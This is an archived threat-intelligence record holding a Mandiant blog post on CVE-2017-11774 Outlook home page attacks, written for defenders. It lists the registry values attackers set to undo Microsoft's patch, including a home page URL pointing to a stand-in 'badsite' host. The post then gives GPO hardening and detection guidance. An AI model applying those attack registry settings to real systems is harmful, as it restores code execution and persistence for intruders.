{
	"id": "d471354c-8c76-48ec-92e1-9888abe8b245",
	"created_at": "2026-04-06T03:36:37.248761Z",
	"updated_at": "2026-04-10T03:33:07.165511Z",
	"deleted_at": null,
	"sha1_hash": "948383d4e7bc89f5ae831c52453b50af40549f14",
	"title": "Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774) | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 602800,
	"plain_text": "Breaking the Rules: A Tough Outlook for Home Page Attacks\r\n(CVE-2017-11774) | Mandiant\r\nBy Mandiant\r\nPublished: 2019-12-04 · Archived: 2026-04-06 03:12:03 UTC\r\nWritten by: Matthew McWhirt, Nick Carr, Douglas Bienstock\r\nAttackers have a dirty little secret that is being used to conduct big intrusions. We’ll explain how they're\r\n\"unpatching\" an exploit and then provide new Outlook hardening guidance that is not available elsewhere.\r\nSpecifically, this blog post covers field-tested automated registry processing for registry keys to protect against\r\nattacker attempts to reverse Microsoft’s CVE-2017-11774 patch functionality.\r\nDespite multiple warnings from FireEye and U.S. Cyber Command, we have continued to observe an uptick in\r\nsuccessful exploitation of CVE-2017-11774, a client-side Outlook attack that involves modifying victims’ Outlook\r\nclient homepages for code execution and persistence. The Outlook Home Page feature allows for customization of\r\nthe default view for any folder in Outlook. This configuration can allow for a specific URL to be loaded and\r\ndisplayed whenever a folder is opened. This URL is retrieved either via HTTP or HTTPS - and can reference\r\neither an internal or external network location. When Outlook loads the remote URL, it will render the contents\r\nusing the Windows DLL ieframe.dll, which can allow an attacker to achieve remote code execution that persists\r\nthrough system restarts.\r\nWe have observed multiple threat actors adopting the technique, which eventually became a favorite of Iranian\r\ngroups in support of both espionage and reportedly destructive attacks. FireEye first observed APT34 use CVE-2017-11774 in June 2018, followed by adoption by APT33 for a significantly broader campaign beginning in July\r\n2018 and continuing for at least a year. 
To further increase awareness of this intrusion vector, our Advanced\r\nPractices team worked with MITRE to update the ATT\u0026CK framework to include CVE-2017-11774 home page\r\npersistence within technique T1137 – “Office Application Startup”.\r\nFor more information on how CVE-2017-11774 exploitation works, how APT33 implemented it alongside\r\npassword spraying, and some common pitfalls for incident responders analyzing this home page technique, see the\r\n“RULER In-The-Wild” section of our December 2018 OVERRULED blog post.\r\nGoing Through a Rough Patch\r\nOn October 10, 2017, Microsoft released patches for Microsoft Outlook to protect against this technique.\r\nKB4011196 (Outlook 2010)\r\nKB4011178 (Outlook 2013)\r\nKB4011162 (Outlook 2016)\r\nhttps://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html\r\nPage 1 of 12\n\nFollowing the mid-2018 abuse by Iranian threat actors first detailed in our OVERRULED blog post, the FireEye\r\nMandiant team began to raise awareness of how the patch could be subverted. Doug Bienstock discussed in\r\nDecember 2018 the simple rollback of the patch as part of Mandiant’s Red Team operations – and alluded\r\nto observing authorized software that also automatically removes the patch functionality. 
In response to U.S.\r\nCyber Command’s mid-2019 warning about APT33’s use of the exploit, we raised concern with DarkReading\r\nover the ability to override the CVE-2017-11774 patch without escalated privileges.\r\nWithout continuous reinforcement of the recommended registry settings for CVE-2017-11774 hardening detailed\r\nwithin this blog post, an attacker can add or revert registry keys for settings that essentially disable the protections\r\nprovided by the patches.\r\nAn attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.\r\nThe “URL” subkey will enable and set a home page for the specified mail folder within the default mailbox.\r\nSetting this registry key to a valid URL enables the home page regardless of whether the patch is applied.\r\nAlthough the option will not be accessible from the Outlook user interface (UI), it will still be set and render.\r\nImportantly, these keys are set within the logged-on user’s Registry hive. This means that no special privileges are\r\nrequired to edit the Registry and roll back the patch. The FireEye Red Team found that no other registry\r\nmodifications were required to set a malicious Outlook homepage.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\WebView\\Inbox\r\n“URL”= http://badsite/homepage-persist.html\r\nThere are additional keys within the Registry that can be modified to further roll back the patch and expose unsafe\r\noptions in Outlook. 
The following setting can be used to re-enable the original home page tab and roaming home\r\npage behavior in the Outlook UI.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\Security\r\n“EnableRoamingFolderHomepages”= dword:00000001\r\nThe following setting will allow for folders within secondary (non-default) mailboxes to leverage a custom home\r\npage.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\Security\r\n“NonDefaultStoreScript”= dword:00000001\r\nThe following setting will allow for “Run as a Script” and “Start Application” rules to be re-enabled.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\Security\r\n“EnableUnsafeClientMailRules”= dword:00000001\r\nWe agree that for the CVE-2017-11774 patch override vector to be successful, a bad guy has to persuade you to\r\nrun his program (law #1) and alter your operating system (law #2). However, the technique is under-reported, no\r\npublic mitigation guidance is available, and – as a fresh in-the-wild example demonstrates in this post – the initial\r\naccess and patch overriding can be completely automated.\r\nA Cavalier Handling of CVE-2017-11774\r\nThe Advanced Practices team monitors for novel implementations of attacker techniques including this patch\r\noverride, and on November 23, 2019 a uniquely automated phishing document was uploaded to VirusTotal. 
The\r\nsample, “TARA Pipeline.xlsm” (MD5: ddbc153e4e63f7b8b6f7aa10a8fad514), launches malicious Excel macros\r\ncombining several techniques, including:\r\nexecution guardrails to only launch on the victim domain (client redacted in screenshot)\r\ncustom pipe-delimited character substitution obfuscation\r\na creative implementation of CVE-2017-11774 using the lesser-known\r\nHKCU\\Software\\Microsoft\\Office\\\\Outlook\\WebView\\Calendar\\URL registry key\r\na URL pointing to the payload hosted in Azure storage blobs (*.web.core.windows.net) – a creative\r\ntechnique that allows an attacker-controlled, swappable payload to be hosted in a legitimate service\r\nand most importantly for this blog post – a function to walk through the registry and reverse the CVE-2017-11774 patch functionality for any version of Microsoft Outlook\r\nThese features of the malicious spear phishing Excel macro can be seen in Figure 1.\r\nFigure 1: Malicious macros automatically reverting the CVE-2017-11774 patch\r\nPay special attention to the forced setting of EnableRoamingFolderHomepages to “1” and the setup of the\r\n“Calendar\\URL” key to point to an attacker-controlled payload, effectively disabling the CVE-2017-11774 patch\r\non initial infection.\r\nIn support of Managed Defense, our Advanced Practices team clusters and tactically attributes targeted threat\r\nactivity – whether the intrusion operators turn out to be authorized or unauthorized – in order to prioritize and\r\ndeconflict intrusions. In this case, Nick Carr attributed this sample to an uncategorized cluster of activity\r\nassociated with authorized red teaming, UNC1194, but you might know them better as the TrustedSec red team\r\nwhose founder, Dave Kennedy, appeared on a previous episode of State of the Hack. 
This malicious Excel file\r\nappears to be a weaponized version of a legitimate victim-created document that we also obtained – reflecting a\r\ntechnique becoming more common with both authorized and unauthorized intrusion operators. For further\r\nanalysis and screenshots of UNC1194’s next-stage CVE-2017-11774 payload for initial reconnaissance, target\r\nlogging visibility checks, and domain-fronted Azure command and control – see here. Readers should take note\r\nthat the automated patch removal and home page exploitation establishes attacker-controlled remote code\r\nexecution and allows these [thankfully authorized] attackers to conduct a full intrusion by swapping out their\r\npayload remotely for all follow-on activity.\r\nLocking Down the Registry Keys Using Group Policy Object (GPO) Enforcement\r\nAs established, the patches for CVE-2017-11774 can be effectively “disabled” by modifying registry keys on an\r\nendpoint with no special privileges. 
The following registry keys and values should be configured via Group Policy\r\nto reinforce the recommended configurations in the event that an attacker attempts to reverse the intended security\r\nconfiguration on an endpoint to allow for Outlook home page persistence for malicious purposes.\r\nTo protect against an attacker using Outlook’s WebView functionality to configure home page persistence, the\r\nfollowing registry key configuration should be enforced.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\WebView\r\n\"Disable\"= dword:00000001\r\nNote: Prior to enforcing this hardening method for all endpoints, the previous setting should be tested on a\r\nsampling of endpoints to ensure compatibility with third-party applications that may leverage webviews.\r\nTo enforce the expected hardened configuration of the registry key using a GPO, the following setting can be\r\nconfigured.\r\nUser Configuration \u003e Preferences \u003e Windows Settings \u003e Registry\r\nNew \u003e Registry Item\r\nAction: Update\r\nHive: HKEY_CURRENT_USER\r\nKey Path: Software\\Microsoft\\Office\\\\Outlook\\Webview\r\nValue Name: Disable\r\nValue Type: REG_DWORD\r\nValue Data: 00000001\r\nFigure 2: Disabling WebView registry setting\r\nIncluded within the Microsoft Office Administrative Templates, a GPO setting is available which can be\r\nconfigured to disable a home page URL from being set in folder properties for all default folders, or for each\r\nfolder individually. 
If set to “Enabled”, the following GPO setting essentially enforces the same registry\r\nconfiguration (disabling WebView) as previously noted.\r\nUser Configuration \u003e Policies \u003e Administrative Templates \u003e Microsoft Outlook \u003e Folder Home Pages for Outlook Sp\r\nThe registry key configuration to disable setting an Outlook home page via the Outlook UI is as follows.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\Security\r\n\"EnableRoamingFolderHomepages\"= dword:00000000\r\nTo enforce the expected hardened configuration of the registry key using a GPO, the following setting can be\r\nconfigured.\r\nUser Configuration \u003e Preferences \u003e Windows Settings \u003e Registry\r\nNew \u003e Registry Item\r\nAction: Update\r\nHive: HKEY_CURRENT_USER\r\nKey Path: Software\\Microsoft\\Office\\\\Outlook\\Security\r\nValue Name: EnableRoamingFolderHomepages\r\nValue Type: REG_DWORD\r\nValue Data: 00000000\r\nFigure 3: EnableRoamingFolderHomepages registry setting\r\nAdditionally, a home page in Outlook can be configured for folders in a non-default datastore. This functionality\r\nis disabled once the patch has been installed, but it can be re-enabled by an attacker. 
Just like this blog post’s\r\nillustration of several different home page URL registry keys abused in-the-wild – including the Outlook Today\r\nsetting from September 2018 and the Calendar URL setting from UNC1194’s November 2019 malicious macros –\r\nthese non-default mailstores provide additional CVE-2017-11774 attack surface.\r\nThe registry key configuration to enforce the recommended setting for non-default mailstores is as follows.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\Security\r\n\"NonDefaultStoreScript\"= dword:00000000\r\nTo enforce the expected hardened configuration of the registry key for non-default mailstores using a GPO, the\r\nfollowing setting can be configured.\r\nUser Configuration \u003e Preferences \u003e Windows Settings \u003e Registry\r\nNew \u003e Registry Item\r\nAction: Update\r\nHive: HKEY_CURRENT_USER\r\nKey Path: Software\\Microsoft\\Office\\\\Outlook\\Security\r\nValue Name: NonDefaultStoreScript\r\nValue Type: REG_DWORD\r\nValue Data: 00000000\r\nFigure 4: NonDefaultStoreScript registry setting\r\nIncluded within the previously referenced Microsoft Office Administrative Templates, a GPO setting is available\r\nwhich can be configured to not allow folders in non-default stores to be set as folder home pages.\r\nUser Configuration \u003e Policies \u003e Administrative Templates \u003e Microsoft Outlook \u003e Outlook Options \u003e Other \u003e Advanc\r\nThe registry key configuration to protect against an attacker re-enabling “Run as a Script” and “Start Application”\r\nrules is as follows.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\Security\r\n\"EnableUnsafeClientMailRules\"= dword:00000000\r\nTo enforce the expected hardened configuration of 
the registry key using a GPO, the following setting can be\r\nconfigured.\r\nUser Configuration \u003e Preferences \u003e Windows Settings \u003e Registry\r\nNew \u003e Registry Item\r\nAction: Update\r\nHive: HKEY_CURRENT_USER\r\nKey Path: Software\\Microsoft\\Office\\\\Outlook\\Security\r\nValue Name: EnableUnsafeClientMailRules\r\nValue Type: REG_DWORD\r\nValue Data: 00000000\r\nFigure 5: EnableUnsafeClientMailRules registry setting\r\nOnce all of the aforementioned endpoint policies are configured – we recommend a final step to protect these settings\r\nfrom unauthorized tampering. To ensure that the registry settings (configured via GPO) are continuously assessed\r\nand applied to an endpoint – even if the registry value was intentionally reversed by an attacker – the following\r\nGPO settings should also be configured and enforced:\r\nComputer Configuration \u003e Policies \u003e Administrative Templates \u003e System \u003e Group Policy \u003e Configure\r\nsecurity policy processing\r\nEnabled - Process even if the Group Policy objects have not changed\r\nComputer Configuration \u003e Policies \u003e Administrative Templates \u003e System \u003e Group Policy \u003e Configure\r\nregistry policy processing\r\nEnabled - Process even if the Group Policy objects have not changed\r\nFigure 6: Group Policy processing settings\r\nFor more environment hardening advice informed by front-line incident response, reach out to our Mandiant\r\nSecurity Transformation Services consulting team.\r\nLet’s Go Hunt (doo doo doo)\r\nWith this blog post, we’re providing an IOC for monitoring CVE-2017-11774 registry tampering – while written\r\nfor FireEye Endpoint Security (HX) in the OpenIOC 1.1 schema, this is a flexible 
behavioral detection standard\r\nthat supports real-time and historical events and the logic can be repurposed for other endpoint products.\r\nThe Yara hunting rule provided by Nick Carr at the end of the OVERRULED blog post still captures payloads using\r\nCVE-2017-11774, including all of those used in intrusions referenced in this post, and can also be used to\r\nproactively identify home page exploits staged on adversary infrastructure. Further FireEye product detection\r\nagainst CVE-2017-11774 is also covered in the OVERRULED blog post.\r\nIf you’ve read the OVERRULED post (or are tired of hearing about it) but want some additional information, we\r\nrecommend:\r\n“You’ve Got Mail!” CDS 2018 technical track presentation including an APT34 CVE-2017-11774 home\r\npage sample\r\n“2 Factor 2 Furious” CDS 2018 technical track presentation on attackers bypassing multifactor – the best\r\nfirst line of defense against APT33’s password spraying and home page usage\r\n“#GuardrailsOfTheGalaxy” MITRE ATT\u0026CKcon 2019 lightning talk on execution guardrails – or see\r\nvarious examples shared on Twitter\r\nInteresting MITRE ATT\u0026CK techniques explicitly referenced in this blog post:\r\nID | Technique | Context\r\nT1137 | Office Application Startup | Nick Carr contributed CVE-2017-11774 on behalf of FireEye for expansion of this technique\r\nT1480 | Execution Guardrails | Nick Carr contributed this new technique to MITRE ATT\u0026CK and it is used within the UNC1194 red team sample in this blog post\r\nAcknowledgements\r\nThe authors would like to acknowledge all of those at FireEye and the rest of the security industry who have\r\ncombatted targeted attackers leveraging creative techniques like home page persistence, but especially the analysts\r\nin Managed Defense SOC working around the clock to secure our customers and have 
disrupted this specific\r\nattack chain several times. We want to thank the SensePost team – for their continued creativity, responsible\r\ndisclosure of CVE-2017-11774, and their defensive-minded release of NotRuler – as well as the TrustedSec crew\r\nfor showing us some innovative implementations of these techniques and being great to coordinate with on this\r\nblog post. Lastly, thanks to Aristotle who has already offered what can only be interpreted as seasoned incident\r\nresponse and hardening advice for those who have seen RULER’s home page persistence in-the-wild: “He who is\r\nto be a good ruler must have first been ruled.”\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html"
	],
	"report_names": [
		"breaking-the-rules-tough-outlook-for-home-page-attacks.html"
	],
	"threat_actors": [
		{
			"id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4",
			"created_at": "2022-10-25T15:50:23.458833Z",
			"updated_at": "2026-04-10T02:00:05.419537Z",
			"deleted_at": null,
			"main_name": "APT34",
			"aliases": null,
			"source_name": "MITRE:APT34",
			"tools": [
				"netstat",
				"Systeminfo",
				"PsExec",
				"SEASHARPEE",
				"Tasklist",
				"Mimikatz",
				"POWRUNER",
				"certutil"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a63c994f-d7d6-4850-a881-730635798b90",
			"created_at": "2025-08-07T02:03:24.788883Z",
			"updated_at": "2026-04-10T02:00:03.785146Z",
			"deleted_at": null,
			"main_name": "COBALT TRINITY",
			"aliases": [
				"APT33 ",
				"Elfin ",
				"HOLMIUM ",
				"MAGNALIUM ",
				"Peach Sandstorm ",
				"Refined Kitten ",
				"TA451 "
			],
			"source_name": "Secureworks:COBALT TRINITY",
			"tools": [
				"AutoCore",
				"Cadlotcorg",
				"Dello RAT",
				"FalseFont",
				"Imminent Monitor",
				"KDALogger",
				"Koadic",
				"NanoCore",
				"NetWire",
				"POWERTON",
				"PoshC2",
				"Poylog",
				"PupyRAT",
				"Schoolbag"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e5ff825b-0456-4013-b90a-971b93def74a",
			"created_at": "2022-10-25T15:50:23.824058Z",
			"updated_at": "2026-04-10T02:00:05.377261Z",
			"deleted_at": null,
			"main_name": "APT33",
			"aliases": [
				"APT33",
				"HOLMIUM",
				"Elfin",
				"Peach Sandstorm"
			],
			"source_name": "MITRE:APT33",
			"tools": [
				"PowerSploit",
				"AutoIt backdoor",
				"PoshC2",
				"Mimikatz",
				"NanoCore",
				"DEADWOOD",
				"StoneDrill",
				"POWERTON",
				"LaZagne",
				"TURNEDUP",
				"NETWIRE",
				"Pupy",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b",
			"created_at": "2025-08-07T02:03:24.722093Z",
			"updated_at": "2026-04-10T02:00:03.681914Z",
			"deleted_at": null,
			"main_name": "COBALT EDGEWATER",
			"aliases": [
				"APT34 ",
				"Cold River ",
				"DNSpionage "
			],
			"source_name": "Secureworks:COBALT EDGEWATER",
			"tools": [
				"AgentDrable",
				"DNSpionage",
				"Karkoff",
				"MailDropper",
				"SideTwist",
				"TWOTONE"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b23e717c-0b27-47e0-b3c8-4defe6dd857f",
			"created_at": "2023-01-06T13:46:38.367369Z",
			"updated_at": "2026-04-10T02:00:02.945356Z",
			"deleted_at": null,
			"main_name": "APT33",
			"aliases": [
				"Elfin",
				"MAGNALLIUM",
				"HOLMIUM",
				"COBALT TRINITY",
				"G0064",
				"ATK35",
				"Peach Sandstorm",
				"TA451",
				"APT 33",
				"Refined Kitten"
			],
			"source_name": "MISPGALAXY:APT33",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775446597,
	"ts_updated_at": 1775791987,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/948383d4e7bc89f5ae831c52453b50af40549f14.pdf",
		"text": "https://archive.orkl.eu/948383d4e7bc89f5ae831c52453b50af40549f14.txt",
		"img": "https://archive.orkl.eu/948383d4e7bc89f5ae831c52453b50af40549f14.jpg"
	}
}